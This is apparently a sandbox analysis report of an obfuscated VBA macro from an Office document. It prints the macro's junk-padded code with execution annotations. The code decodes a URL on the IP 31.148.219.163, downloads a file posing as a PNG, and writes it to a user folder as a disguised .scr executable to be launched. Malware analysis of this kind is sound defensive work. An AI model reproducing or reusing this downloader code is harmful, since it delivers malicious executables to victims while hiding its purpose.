 16   Qg0lj(3) = (- 528 + 259) + 4
 17   Dim Vy87F(7 To 248) as String
 18   Vy87F(7) = Ik728                                    Ik728
 19   Dim X02ob as Byte
 20   X02ob = 111
 21   Dim Lgqf0(84) as Byte
 22   Lgqf0(84) = 138
 23   Dim Ej4Ik(44) as Byte
 24   Ej4Ik(44) = 186
 25   Dim Ltz67 as String
 26   Ltz67 = "Qjod7"
 27   Dim N36ch as Long
 28   N36ch = (- 487 + 918) + 46
 29   Dim F1YcV as Byte
 30   F1YcV = 234
 31   Dim J5Unu(21) as Byte
 32   J5Unu(21) = 116
 33   Dim Z1Q05 as Long
 34   Z1Q05 = (- 385 / 711) - 36
 35   Dim No560 as Byte
 36   No560 = 104
 37   Dim Gardq(14 To 44) as String
 38   Gardq(14) = A014z                                   A014z
 39   Dim Mj865 as Long
 40   Mj865 = (565 / 173) + 19
 41   Dim E38D5(13 To 76) as Long
 42   E38D5(13) = (803 + 826) + 29
 43   Dim H25p8(14 To 339) as String
 44   H25p8(14) = "Z65y7"
 45   Dim Yx77T(14 To 478) as String
 46   Yx77T(14) = "Ph5Xn"
 47   Dim YRnH6(24 To 499) as String
 48   YRnH6(24) = UrERz                                   UrERz
 49   Dim BO5Ll(25 To 250) as Long
 50   BO5Ll(25) = (- 317 + 385) + 42
 51   Dim DkZQe(83) as Byte
 52   DkZQe(83) = 193
 53   Dim In0TS(56) as Byte
 54   In0TS(56) = 113
 55   Dim W4sB8(9 To 436) as Long
 56   W4sB8(9) = (- 573 / 409) - 20
 57   U5P6J = 3
 58   Dim Np0lB as Byte
 59   Dim SM03Q(96) as Byte
 60   SM03Q(96) = 48
 61   OG3wL = BjOEsxO3("kwws=2264147;154<14962lpdjhv2orjr51sqj", 3)
 62   Dim W08oB(4 To 498) as String
 63   W08oB(4) = YcIPR                                    YcIPR
 64   Dim A17Ss(3 To 131) as String
 65   A17Ss(3) = MRbO5                                    MRbO5
 66   JqQxS = I8BD2(CStr(OG3wL), H3450)                   CStr
 67   Dim HWXvn(1) as Byte
 68   HWXvn(1) = 193
 69   Dim XpDX4(12 To 164) as String
 70   XpDX4(12) = "PGNG2"
 71   Dim S56Ei(2 To 137) as String
 72   S56Ei(2) = NIuZE                                    NIuZE
 73   Dim XH8ys as String
 74   XH8ys = "Um550"
 75   Dim D3771 as String
 76   D3771 = EP2DB                                       EP2DB
 77   Set H8sz2 = New LKfy2
 78   Dim Phi5G(10 To 487) as Long
 79   Phi5G(10) = (604 / 938) + 35
 80   Dim DCU0D as String
 81   DCU0D = "P8VN5"
 82   Dim Pzq8I as String
 83   Pzq8I = ZvDa2                                       ZvDa2
 84   Dim ASlRX as String
 85   ASlRX = "HEV04"
 86   Dim R4HT8 as String
 87   R4HT8 = "Fgnvk"
 88   Dim H05yl(23 To 116) as String
 89   H05yl(23) = "EMy1m"
 90   Call H8sz2.test1(JqQxS, H3450)
 91   Dim RdOLo as Byte
 92   Dim GZbj1(10 To 246) as Long
 93   GZbj1(10) = (- 373 - 474) + 14
 94   Dim DrBDn as String
 95   DrBDn = "J6DD5"
 96   Dim FvrWP(28 To 88) as Long
 97   FvrWP(28) = (823 / 524) / 27
 98   Dim G6sS1(92) as Byte
 99   G6sS1(92) = 19
100   Dim QN2gr as Long
101   QN2gr = (784 - 717) / 14
102   Dim E6t54(76) as Byte
103   E6t54(76) = 232
104   Dim RAYYk as String
105   RAYYk = "AsukH"
106   Dim MPbFq(66) as Byte
107   MPbFq(66) = 80
108   Call H8sz2.sh1(H3450)
109   Dim UqrUz(16 To 316) as Long
110   UqrUz(16) = (305 - 894) + 49
111   Dim G153l(6 To 118) as String
112   G153l(6) = G0d64                                    G0d64
113   Dim JdUVu(29) as Byte
114   JdUVu(29) = 29
115   Dim G61y7 as Byte
116   G61y7 = 79
117   Dim E1886(18 To 265) as Long
118   E1886(18) = (- 376 - 619) - 2
119   Dim Y8OAf(28) as Byte
120   Y8OAf(28) = 166
121   Dim R1Sfd as Long
122   R1Sfd = (- 690 - 587) + 12
123   Dim L1SPN(58) as Byte
124   L1SPN(58) = 35
125   Dim CN0Hv(24 To 25) as Long
126   CN0Hv(24) = (588 - 519) - 12
127   Dim Bn7IT(12 To 248) as String
128   Bn7IT(12) = "MqXa4"
129   Dim Z616Y(58) as Byte
130   Z616Y(58) = 27
131   Dim BUaTF(6 To 252) as String
132   BUaTF(6) = W362Y                                    W362Y
133   Dim D3r3M as Long
134   D3r3M = (- 750 / 201) - 33
135   Dim RiA0L as Byte
136   RiA0L = 23
137   Dim R56lI as String
138   R56lI = "CA6bX"
139   Dim Snt77 as Byte
140   Dim IwL03(8 To 123) as String
141   IwL03(8) = GjaAA                                    GjaAA
142   Dim Zu23C as Long
143   Zu23C = (- 184 - 544) + 44
144   End Sub

Module: JtuJu

Declaration
Line  Content
  1   Attribute VB_Name = "JtuJu"

Executed Functions
APIs / Meta Information:
VKsr5, VFDa2, QGdom, TO8KM, H87Y8, XPcZ8, Wt628,
Open: IServerXMLHTTPRequest2.Open("GET","http://31.148.219.163/images/logo2.png",False),
Lyu7w, YT4R3, ECehc, CTt54, send, IO4H1, DMpT6, V6si1, WlH6E, JNo8v, D7Hyo, responseBody, FuUpS, G065k, FG3dN

Strings: Decrypted Strings
"DD4qR", "QdrWc", "GET", "Rt6r5", "U06mm", "G3mne", "VGe22", "F4gH0",
"G6Kaw", "ELc2n", "MND87", "BMf14", "ZhWm1", "BVsV7", "UoI88", "Gta02",
"DHrmI", "KkZbP", "InRz7", "MTXLz", "Eywfs", "Tylh3", "Ih5PG", "GmIPI"

Line  Instruction                                         Meta Information
  2   Public Function I8BD2(HT73f as String, LuU0P as String)
  3   Dim U5grB as Byte                                   executed
  4   Dim BZ5kz(47) as Byte
  5   BZ5kz(47) = 223
  6   Dim I18Kb as String
  7   I18Kb = "DD4qR"
  8   Dim Cy6v7 as String
  9   Cy6v7 = VKsr5                                       VKsr5
 10   Dim FI3dl as Long
 11   FI3dl = (516 - 230) - 18
 12   Dim Hky13 as Byte
 13   Dim IdLrH as Long
 14   IdLrH = (- 25 / 456) + 31
 15   Dim Qngb3(16) as Byte
 16   Qngb3(16) = 145
 17   Dim JB0z2 as Byte
 18   Dim LS5OD as Byte
 19   Dim Pf784 as String
 20   Pf784 = VFDa2                                       VFDa2
 21   Dim Gh0Hi(7 To 13) as String
 22   Gh0Hi(7) = QGdom                                    QGdom
 23   Dim MieO2 as Byte
 24   Dim JYMxd as Byte
 25   JYMxd = 201
 26   Dim OF46X as Byte
 27   OF46X = 23
 28   Dim D6G21(17 To 442) as String
 29   D6G21(17) = TO8KM                                   TO8KM
 30   Dim WtOn1 as Long
 31   WtOn1 = (527 + 736) + 1
 32   Dim FF6H5(31) as Byte
 33   FF6H5(31) = 11
 34   Dim Bu6X2(92) as Byte
 35   Bu6X2(92) = 242
 36   Dim SU7bX as Byte
 37   SU7bX = 14
 38   Dim XK2JW as Byte
 39   XK2JW = 171
 40   Dim HI6ZS as Byte
 41   Dim SNu2g as Long
 42   SNu2g = (499 - 716) / 14
 43   Dim YLL53(16) as Byte
 44   YLL53(16) = 64
 45   Dim FFiqz(24) as Byte
 46   FFiqz(24) = 167
 47   Dim QWbb8 as Long
 48   QWbb8 = (- 631 - 525) + 28
 49   Dim LSprl as Byte
 50   Dim VTNzR(35) as Byte
 51   VTNzR(35) = 171
 52   Set NjL7i = New MSXML2.XMLHTTP60
 53   Dim JjohY as Long
 54   JjohY = (- 208 / 955) / 19
 55   Dim Ii2q5(29) as Byte
 56   Ii2q5(29) = 168
 57   Dim J02ms(33 To 183) as String
 58   J02ms(33) = H87Y8                                   H87Y8
 59   Dim JRCMV as Byte
 60   Dim LJRn2 as String
 61   LJRn2 = XPcZ8                                       XPcZ8
 62   Dim Y7r6A as Long
 63   Y7r6A = (120 - 526) / 32
 64   Dim A8y3O as String
 65   A8y3O = Wt628                                       Wt628
 66   Dim VPlmH as Long
 67   VPlmH = (- 836 - 272) - 46
 68   Dim N4Yxi as String
 69   N4Yxi = "QdrWc"
 70   Dim BD3cq as Byte
 71   Dim PIs8w as Long
 72   PIs8w = (- 500 / 156) / 38
 73   Dim N7HlY as Long
 74   N7HlY = (749 + 930) + 20
 75   Dim Zn5aV(23 To 108) as Long
 76   Zn5aV(23) = (- 173 + 224) - 36
 77   NjL7i.Open "GET", HT73f, False                      IServerXMLHTTPRequest2.Open("GET","http://31.148.219.163/images/logo2.png",False); executed
 78   Dim Nc6qJ as String
 79   Nc6qJ = "Rt6r5"
 80   Dim D3Ic2 as String
 81   D3Ic2 = Lyu7w                                       Lyu7w
 82   Dim UZ3ZO as Byte
 83   Dim HFxF6(40) as Byte
 84   HFxF6(40) = 48
 85   Dim K81yo(14 To 498) as String
 86   K81yo(14) = YT4R3                                   YT4R3
 87   Dim SjZ35(71) as Byte
 88   SjZ35(71) = 239
 89   Dim BSofa as Byte
 90   Dim C3G0E as Byte
 91   Dim EiLn6 as Byte
 92   EiLn6 = 248
 93   Dim S42Zq(12 To 249) as String
 94   S42Zq(12) = "U06mm"
 95   Dim MPPFQ as Long
 96   MPPFQ = (425 + 422) + 21
 97   Dim CRaOL(7) as Byte
 98   CRaOL(7) = 76
 99   Dim YH7u0 as Byte
100   YH7u0 = 174
101   Dim ACblY as Long
102   ACblY = (223 - 137) / 9
103   Dim RJQIq(22 To 353) as Long
104   RJQIq(22) = (- 338 / 233) + 48
105   Dim ChFnV as String
106   ChFnV = ECehc                                       ECehc
107   Dim L35r0(22 To 373) as String
108   L35r0(22) = "G3mne"
109   Dim Byj44 as Byte
110   Byj44 = 63
111   Dim VNJM6(31 To 98) as String
112   VNJM6(31) = CTt54                                   CTt54
113   Dim SRHtH(1 To 284) as Long
114   SRHtH(1) = (- 276 + 526) / 16
115   Dim ZyRzJ as String
116   ZyRzJ = "VGe22"
117   Dim RRyRA as String
118   RRyRA = "F4gH0"
119   Dim J2OM5(8 To 488) as String
120   J2OM5(8) = "G6Kaw"
121   Dim ApYPS as String
122   ApYPS = "ELc2n"
123   Dim Az3p7(3 To 103) as String
124   Az3p7(3) = "MND87"
125   Dim EZ1ZV(66) as Byte
126   EZ1ZV(66) = 76
127   Dim Af13k as Long
128   Af13k = (- 295 + 951) - 12
129   Dim R51Vs(27 To 65) as Long
130   R51Vs(27) = (- 308 - 382) - 34
131   NjL7i.send                                          send
132   Dim PNT74(45) as Byte
133   PNT74(45) = 97
134   Dim Q2615 as String
135   Q2615 = "BMf14"
136   Dim K44qS as Long
137   K44qS = (342 / 470) + 13
138   Dim BAhW5(52) as Byte
139   BAhW5(52) = 21
140   Dim Jj1W5(5 To 73) as Long
141   Jj1W5(5) = (- 438 / 935) - 9
142   Dim Rr5Bg(16 To 423) as String
143   Rr5Bg(16) = "ZhWm1"
144   Dim Mxq43(99) as Byte
145   Mxq43(99) = 19
146   Dim L8edw as String
147   L8edw = "BVsV7"
148   Dim Y2Eo8 as Byte
149   Y2Eo8 = 83
150   Dim SQ1x7 as Long
151   SQ1x7 = (- 329 + 735) + 46
152   Dim Chd6y(20 To 59) as Long
153   Chd6y(20) = (- 378 / 840) - 20
154   Dim VUpu6(18 To 238) as Long
155   VUpu6(18) = (581 + 854) / 3
156   Dim Tl0JN as Byte
157   Tl0JN = 135
158   Dim PinNp(30 To 173) as String
159   PinNp(30) = "UoI88"
160   Dim S40aq as String
161   S40aq = "Gta02"
162   Dim B3fX6(20 To 441) as Long
163   B3fX6(20) = (972 - 891) + 13
164   Dim HWO4Q as String
165   HWO4Q = "DHrmI"
166   Dim Vqs00(22 To 338) as String
167   Vqs00(22) = IO4H1                                   IO4H1
168   Dim YA1t2 as String
169   YA1t2 = "KkZbP"
170   Dim P3FE7 as String
171   P3FE7 = DMpT6                                       DMpT6
172   Dim OG7w8(26 To 272) as String
173   OG7w8(26) = V6si1                                   V6si1
174   Dim U0JxK(97) as Byte
175   U0JxK(97) = 240
176   Dim Un55J as Long
177   Un55J = (- 102 / 376) - 26
178   Dim J88mQ(27 To 101) as String
179   J88mQ(27) = WlH6E                                   WlH6E
180   Dim KcQt7(30 To 398) as String
181   KcQt7(30) = "InRz7"
182   Dim ZnrB1(27 To 492) as Long
183   ZnrB1(27) = (- 645 / 403) / 49
184   Dim O4wI8 as String
185   O4wI8 = JNo8v                                       JNo8v
186   Dim YERsH as String
187   YERsH = D7Hyo                                       D7Hyo
188   Dim Xlis1(6 To 91) as Long
189   Xlis1(6) = (868 + 851) + 10
190   OyTW4 = NjL7i.responseBody                          responseBody
191   Dim M5tx8(21 To 317) as String
192   M5tx8(21) = "MTXLz"
193   Dim WSeKK as String
194   WSeKK = FuUpS                                       FuUpS
195   Dim RZyw2(40) as Byte
196   RZyw2(40) = 81
197   Dim FfRhl as String
198   FfRhl = G065k                                       G065k
199   I8BD2 = OyTW4
200   Dim Ntfxk as Long
201   Ntfxk = (- 66 - 109) + 26
202   Dim EMnFI as String
203   EMnFI = "Eywfs"
204   Dim YcD6N(73) as Byte
205   YcD6N(73) = 10
206   Dim MbC11 as String
207   MbC11 = "Tylh3"
208   Dim C0G6z(26 To 229) as String
209   C0G6z(26) = FG3dN                                   FG3dN
210   Dim RgWK0(28) as Byte
211   RgWK0(28) = 129
212   Dim S35Y4 as Long
213   S35Y4 = (- 651 + 301) / 27
214   Dim XY43o(8 To 228) as Long
215   XY43o(8) = (- 905 + 335) / 32
216   Dim O1x15(22) as Byte
217   O1x15(22) = 64
218   Dim M3R3w as Byte
219   Dim R3QFe(6) as Byte
220   R3QFe(6) = 30
221   Dim A78vE as Byte
222   A78vE = 126
223   Dim B664h as Long
224   B664h = (18 + 538) / 27
225   Dim QH55r as String
226   QH55r = "Ih5PG"
227   Dim B8i78 as Long
228   B8i78 = (- 843 + 422) - 18
229   Dim JvV5U(46) as Byte
230   JvV5U(46) = 226
231   Dim RkMj1 as String
232   RkMj1 = "GmIPI"
233   End Function

                    Module: LKfy2

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "LKfy2"

                    2

                    Attribute VB_Base = "0{0917F18E-9EE5-4716-82FB-F3C380FC94B1}{ECD25D7D-BA7A-4CC7-A896-BAC7A9D141C6}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = False

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = False

Executed Functions

APIs | Meta Information
W6GKF
Xbh0h
ZGVT4
S8SxT
IZy5i
Jm1cs
ZOaK2
R3bh6
R828O
UrlR1
Ac5W6
Jzed2
WHhbG
L50h6
SbxRg
UBound
SgThF
L4k6Z
AJQF4
DQZ20
Ft8Bk
UBound
Eb3be
SYbzA
B4bP1
I2sZr
VvZ0F
QKBEp
RdHtR
X5D63
Open | Open("C:\Users\luketaylor\text.doc.16147.scr")
ZdOQk
DW7qw
AC4wm
SkX5n
K6Lww
J7ie0
Ic1Eh
DEOo8
M0huq
E40L2
DBJaS
Hf724
LGvtQ
OkaWA
JrPYW
F6kH3
Hf7hK

Strings | Decrypted Strings
"DzVR8"
"W6v4x"
"CY3m7"
"R452k"
"GOUC2"
"OXkdT"
"T10VB"
"Y7745"
"GzOjv"
"UmDpA"
"YB32w"
"Dw75W"
"PhHn0"
"V8qkI"
"J8IL7"
"DD0qd"
"Iundr"
"QXHK6"
"YK22i"
"XuidR"
"X6wh0"
"EHw60"
"M88Xk"
"LMP6t"
"PA7En"
"JmTzx"
"Zo6UE"
"OvD2n"
"BNFSv"
"OJ4L1"
"Vs33Z"
"JqSOJ"
Line | Instruction | Meta Information
9 | Public Sub test1(FW5Vg, Oj62U)
10 | Dim HMDxF as Long | executed
11 | HMDxF = (381 / 353) / 30
12 | Dim UbUB4 as Byte
13 | UbUB4 = 137
14 | Dim Ih7m7 as Long
15 | Ih7m7 = (619 + 960) / 6
16 | Dim ZGxe7 as String
17 | ZGxe7 = "DzVR8"
18 | Dim KsIBn(31 To 213) as String
19 | KsIBn(31) = W6GKF | W6GKF
20 | Dim WSn2h(27 To 32) as String
21 | WSn2h(27) = Xbh0h | Xbh0h
22 | Dim NjUS4 as Byte
23 | Dim DeD6w as Long
24 | DeD6w = (567 / 165) - 46
25 | Dim Lt5qg(95) as Byte
26 | Lt5qg(95) = 197
27 | Dim P6p0K as Byte
28 | Dim JgRHa(88) as Byte
29 | JgRHa(88) = 174
30 | Dim AB3T3 as Long
31 | AB3T3 = (- 35 + 980) + 48
32 | Dim QOhqa(21 To 327) as String
33 | QOhqa(21) = ZGVT4 | ZGVT4
34 | Dim Vl18Z as Long
35 | Vl18Z = (395 - 767) + 28
36 | Dim SBC3y(13 To 237) as Long
37 | SBC3y(13) = (588 / 887) + 38
38 | Dim PhO70 as Byte
39 | PhO70 = 17
40 | Dim TEe28 as Long
41 | TEe28 = (528 - 713) / 45
42 | Dim Emnh5(28 To 342) as Long
43 | Emnh5(28) = (- 322 + 695) + 4
44 | Dim Jn7t4 as String
45 | Jn7t4 = S8SxT | S8SxT
46 | Dim Ag7HR as Byte
47 | Ag7HR = 247
48 | Dim D11C8(79) as Byte
49 | D11C8(79) = 159
50 | Dim KrjXB as String
51 | KrjXB = IZy5i | IZy5i
52 | Dim HHYU8(99) as Byte
53 | HHYU8(99) = 88
54 | Dim D60Tw(23 To 237) as Long
55 | D60Tw(23) = (- 371 / 438) + 48
56 | Dim QRXmn(57) as Byte
57 | QRXmn(57) = 165
58 | Dim O42h2(90) as Byte
59 | O42h2(90) = 13
60 | Dim Ha1Oz as Byte
61 | Dim GFRR5(7 To 493) as Long
62 | GFRR5(7) = (949 + 872) / 23
63 | Dim Cw05K(44) as Byte
64 | Cw05K(44) = 62
65 | Dim FkN4O as Long
66 | FkN4O = (342 + 529) / 43
67 | Dim Gu8Xe() as Byte
68 | Dim YVJIa(1 To 100) as String
69 | YVJIa(1) = "W6v4x"
70 | Dim J1GIt(12 To 196) as String
71 | J1GIt(12) = "CY3m7"
72 | Dim RBnS3(27 To 62) as Long
73 | RBnS3(27) = (61 + 535) + 2
74 | Dim CHr22 as String
75 | CHr22 = "R452k"
76 | Dim MXWMF as String
77 | MXWMF = Jm1cs | Jm1cs
78 | Dim VC8p1 as Byte
79 | Dim Zz0vc as String
80 | Zz0vc = ZOaK2 | ZOaK2
81 | Dim I07BM as Byte
82 | I07BM = 23
83 | Dim C5VD1(8) as Byte
84 | C5VD1(8) = 160
85 | Dim V203p as Long
86 | V203p = (973 - 135) / 21
87 | Dim GwNDK(0 To 1) as Long
88 | GwNDK(0) = (961 / 78) + 41
89 | Dim Ez2bF as Byte
90 | Dim Q8D6s(16 To 384) as String
91 | Q8D6s(16) = R3bh6 | R3bh6
92 | With CreateObject("adodb.stream")
93 | Dim NEZVw as String
94 | NEZVw = R828O | R828O
95 | Dim J43u7 as Long
96 | J43u7 = (- 384 - 743) / 43
97 | Dim T5s85 as Byte
98 | Dim SX1Vo as Long
99 | SX1Vo = (- 431 / 148) + 3
100 | Dim AItjD(7 To 334) as String
101 | AItjD(7) = "GOUC2"
102 | Dim H8U51(10 To 433) as String
103 | H8U51(10) = "OXkdT"
104 | Dim F7SOQ(18 To 489) as Long
105 | F7SOQ(18) = (126 / 963) / 32
106 | Dim B1ptR(92) as Byte
107 | B1ptR(92) = 254
108 | Dim B1E7i as Long
109 | B1E7i = (- 451 + 601) - 3
110 | Dim LuC6X(27 To 180) as String
111 | LuC6X(27) = "T10VB"
112 | Dim Inz8x(25 To 73) as Long
113 | Inz8x(25) = (460 + 21) / 11
114 | Dim Dykvf as Byte
115 | Dim UsEEv as Byte
116 | Dim J3IU5 as String
117 | J3IU5 = UrlR1 | UrlR1
118 | Dim FJCT0 as String
119 | FJCT0 = Ac5W6 | Ac5W6
120 | Dim TbR8V(1 To 147) as String
121 | TbR8V(1) = "Y7745"
122 | Dim EHPw0(15 To 212) as Long
123 | EHPw0(15) = (- 341 - 426) / 20
124 | Dim DVnJi(27 To 477) as String
125 | DVnJi(27) = "GzOjv"
126 | Dim NW6p8 as Byte
127 | Dim D6h37 as Byte
128 | Dim FwIFb(79) as Byte
129 | FwIFb(79) = 119
130 | Dim JA4xm as String
131 | JA4xm = "UmDpA"
132 | Dim T2V7i(21 To 68) as Long
133 | T2V7i(21) = (684 / 734) - 13
134 | Dim Gnay3(7 To 104) as Long
135 | Gnay3(7) = (572 + 784) - 18
136 | Dim W7K57 as Byte
137 | Dim M3P4t as Long
138 | M3P4t = (- 7 - 600) + 8
139 | Dim EZD6g(46) as Byte
140 | EZD6g(46) = 99
141 | Dim E0ArF as Byte
142 | Dim K0u3O(26 To 100) as Long
143 | K0u3O(26) = (858 / 645) + 16
144 | Dim JAt20(26) as Byte
145 | JAt20(26) = 2
146 | Dim GH7R6(11) as Byte
147 | GH7R6(11) = 100
148 | Dim Q1Z8R(80) as Byte
149 | Q1Z8R(80) = 38
150 | Dim S8f8P as Long
151 | S8f8P = (633 - 582) - 27
152 | Dim QDpZG as Long
153 | QDpZG = (- 383 + 777) / 49
154 | Dim I3cWu as Byte
155 | I3cWu = 228
156 | Dim D60h2 as Byte
157 | D60h2 = 254
158 | Dim R4246 as Byte
159 | Dim ByhT5(9 To 255) as Long
160 | ByhT5(9) = (- 309 + 243) - 8
161 | . Type = 1
162 | Dim M70t5(18 To 283) as Long
163 | M70t5(18) = (- 363 / 874) + 8
164 | Dim QcItR as Byte
165 | QcItR = 82
166 | Dim PErd4(66) as Byte
167 | PErd4(66) = 46
168 | Dim RJD57(53) as Byte
169 | RJD57(53) = 96
170 | Dim UdLIC(3 To 256) as String
171 | UdLIC(3) = Jzed2 | Jzed2
172 | Dim T0t5u(95) as Byte
173 | T0t5u(95) = 61
174 | Dim TE2BA as String
175 | TE2BA = WHhbG | WHhbG
176 | Dim A05tr as Long
177 | A05tr = (87 - 563) - 1
178 | Dim QVj2A(1 To 414) as String
179 | QVj2A(1) = L50h6 | L50h6
180 | Dim FF0qk(17) as Byte
181 | FF0qk(17) = 212
182 | Dim J2Oo7(30 To 446) as String
183 | J2Oo7(30) = "YB32w"
184 | . Open
185 | Dim F6e0j as Byte
186 | F6e0j = 23
187 | Dim VpzpC(42) as Byte
188 | VpzpC(42) = 199
189 | . Write FW5Vg
190 | Dim URyPU(4 To 360) as Long
191 | URyPU(4) = (418 / 242) / 45
192 | Ez2bF = 169
193 | Dim Lx3y2(0 To 1) as String
194 | Lx3y2(0) = "Dw75W"
195 | Dim PBnGN as String
196 | PBnGN = "PhHn0"
197 | Dim O0tFy(20 To 168) as Long
198 | O0tFy(20) = (- 397 + 444) - 48
199 | Dim LGp6q as Long
200 | LGp6q = (984 / 460) / 11
201 | Dim BV1ha as String
202 | BV1ha = "V8qkI"
203 | Dim WrA2d(15 To 252) as String
204 | WrA2d(15) = SbxRg | SbxRg
205 | Redim Gu8Xe(UBound(FW5Vg) + Ez2bF) | UBound
206 | Dim OEP8X as Long
207 | OEP8X = (- 499 / 36) + 18
208 | Dim NCPvi as String
209 | NCPvi = SgThF | SgThF
210 | Dim Yrt6o as String
211 | Yrt6o = "J8IL7"
212 | Dim I6LL6(10 To 52) as String
213 | I6LL6(10) = "DD0qd"
214 | Dim JZMjI as Byte
215 | JZMjI = 29
216 | Dim QwoJ8 as String
217 | QwoJ8 = "Iundr"
218 | Dim MS04Q as Byte
219 | MS04Q = 47
220 | Dim KPnWw as Long
221 | KPnWw = (- 728 - 812) - 37
222 | Dim Bj6FC as String
223 | Bj6FC = "QXHK6"
224 | Dim UyUCU as Byte
225 | Dim L88zU as Byte
226 | L88zU = 113
227 | Dim SpFgy(22) as Byte
228 | SpFgy(22) = 68
229 | Dim Cdqbn as String
230 | Cdqbn = L4k6Z | L4k6Z
231 | Dim H0XK7 as String
232 | H0XK7 = AJQF4 | AJQF4
233 | Dim M7Bio(22 To 27) as String
234 | M7Bio(22) = DQZ20 | DQZ20
235 | Dim HXSQn(31 To 147) as String
236 | HXSQn(31) = Ft8Bk | Ft8Bk
237 | Dim U5HU6(30 To 303) as String
238 | U5HU6(30) = "YK22i"
239 | Dim Y7pvu as Byte
240 | Dim Cj68m(91) as Byte
241 | Cj68m(91) = 191
242 | ZQcI5 = 62792
243 | For V3a1w = 62792 To UBound(FW5Vg) | UBound
244 | Qq73S = Eb3be | Eb3be
245 | MmLPO = SYbzA | SYbzA
246 | FFBfg = B4bP1 | B4bP1
247 | ADOq8 = 132
248 | J302e = I2sZr | I2sZr
249 | Z48wG = VvZ0F | VvZ0F
250 | Gu8Xe(V3a1w - 62792) = FW5Vg(V3a1w)
251 | C14e5 = QKBEp | QKBEp
252 | V30b8 = RdHtR | RdHtR
253 | Next | UBound
254 | Dim DkEHg(34 To 166) as Long
255 | DkEHg(34) = (- 189 / 422) + 28
256 | Dim YapM0(14 To 40) as Long
257 | YapM0(14) = (- 28 / 364) / 42
258 | Dim TkHQU(32 To 420) as String
259 | TkHQU(32) = "XuidR"
260 | Dim J74kH(2 To 21) as Long
261 | J74kH(2) = (- 575 / 154) - 2
262 | Dim QRDfP(21 To 171) as Long
263 | QRDfP(21) = (- 754 / 673) - 5
264 | Dim T368b(19) as Byte
265 | T368b(19) = 27
266 | Gu8Xe(ADOq8) = Ez2bF
267 | Dim WF687 as String
268 | WF687 = X5D63 | X5D63
269 | Dim NxyRH as Byte
270 | NxyRH = 74
271 | Dim RLxl1 as String
272 | RLxl1 = "X6wh0"
273 | Open Oj62U For Binary As # 6 | Open("C:\Users\luketaylor\text.doc.16147.scr"); executed
274 | Dim Z87Cn(90) as Byte
275 | Z87Cn(90) = 82
276 | Put # 6, , Gu8Xe
277 | Dim NEX75(11 To 150) as String
278 | NEX75(11) = "EHw60"
279 | Dim Mu7id(24 To 263) as String
280 | Mu7id(24) = ZdOQk | ZdOQk
281 | Dim TxsAb(7 To 37) as Long
282 | TxsAb(7) = (- 258 + 208) / 4
283 | Dim S8bLT as Byte
284 | S8bLT = 253
285 | Dim Crs4A(18 To 228) as Long
286 | Crs4A(18) = (535 + 57) - 12
287 | Dim FzI6j(8) as Byte
288 | FzI6j(8) = 244
289 | Dim IAJgk as String
290 | IAJgk = "M88Xk"
291 | Dim QQ3P0 as String
292 | QQ3P0 = DW7qw | DW7qw
293 | Dim Rquv5 as Long
294 | Rquv5 = (677 + 286) - 48
295 | Dim S6p26 as String
296 | S6p26 = AC4wm | AC4wm
297 | Dim OpjqX(25) as Byte
298 | OpjqX(25) = 77
299 | Dim O66TD as String
300 | O66TD = SkX5n | SkX5n
301 | Close # 6
302 | Dim WpIoU(14 To 265) as Long
303 | WpIoU(14) = (- 869 - 90) + 2
304 | Dim MkkVn(38) as Byte
305 | MkkVn(38) = 28
306 | Dim Pa3K2(25 To 233) as Long
307 | Pa3K2(25) = (- 434 + 189) - 32
308 | Dim K7iv6(21 To 490) as String
309 | K7iv6(21) = K6Lww | K6Lww
310 | Dim NUIv4(7 To 14) as Long
311 | NUIv4(7) = (576 - 62) / 34
312 | Dim AbK61 as Byte
313 | Dim WV2q6(21 To 281) as Long
314 | WV2q6(21) = (- 641 + 415) + 20
315 | Dim O0302(8 To 390) as String
316 | O0302(8) = J7ie0 | J7ie0
317 | Dim Q88WO as Long
318 | Q88WO = (- 652 + 702) + 43
319 | Dim QH5Gc as String
320 | QH5Gc = "LMP6t"
321 | Dim URwC7 as Long
322 | URwC7 = (- 974 - 272) + 25
323 | Dim GZUB0 as Byte
324 | Dim T5F8J as String
325 | T5F8J = Ic1Eh | Ic1Eh
326 | Dim H7U0t as Byte
327 | H7U0t = 185
328 | Dim E01G7 as Byte
329 | End With
330 | Dim M4G2b(37) as Byte
331 | M4G2b(37) = 21
332 | Dim Hmja5(16 To 115) as Long
333 | Hmja5(16) = (604 + 348) - 23
334 | Dim Yq4b6 as String
335 | Yq4b6 = "PA7En"
336 | Dim Lrxr4 as Long
337 | Lrxr4 = (- 948 / 663) / 1
338 | Dim A3kNR as Long
339 | A3kNR = (- 405 / 871) - 34
340 | Dim L6X4W(29) as Byte
341 | L6X4W(29) = 246
342 | Dim H4vCl as Byte
343 | Dim SnR7P as Long
344 | SnR7P = (883 - 960) / 32
345 | Dim EA77f as Byte
346 | Dim Ba0su(25 To 216) as Long
347 | Ba0su(25) = (645 - 996) / 7
348 | Dim GRZ8p(17 To 42) as String
349 | GRZ8p(17) = DEOo8 | DEOo8
350 | Dim G50D0 as Long
351 | G50D0 = (414 + 157) - 3
352 | Dim E1p3y as String
353 | E1p3y = M0huq | M0huq
354 | Dim Q80xi as String
355 | Q80xi = E40L2 | E40L2
356 | Dim BvUd1(9 To 133) as Long
357 | BvUd1(9) = (- 959 + 284) / 9
358 | Dim O85R8 as Long
359 | O85R8 = (314 - 759) - 2
360 | Dim Atdh3 as Byte
361 | Atdh3 = 0
362 | Dim E4yc5 as Long
363 | E4yc5 = (- 166 / 740) - 48
364 | Dim I8KSQ(12 To 17) as String
365 | I8KSQ(12) = "JmTzx"
366 | Dim IR4K2 as Long
367 | IR4K2 = (- 658 + 63) - 19
368 | Dim PfM2W as Byte
369 | PfM2W = 160
370 | Dim Z0ejl as Long
371 | Z0ejl = (- 733 - 497) - 46
372 | Dim D306l as String
373 | D306l = DBJaS | DBJaS
374 | Dim PDT56(97) as Byte
375 | PDT56(97) = 231
376 | Dim EdbfP as Byte
377 | EdbfP = 74
378 | Dim C5yy5(28) as Byte
379 | C5yy5(28) = 161
380 | Dim GcRAS as Byte
381 | Dim OI0H3 as String
382 | OI0H3 = Hf724 | Hf724
383 | Dim WBD52(20 To 47) as String
384 | WBD52(20) = LGvtQ | LGvtQ
385 | Dim X3k4t(4 To 447) as String
386 | X3k4t(4) = "Zo6UE"
387 | Dim Q2Q4P as Long
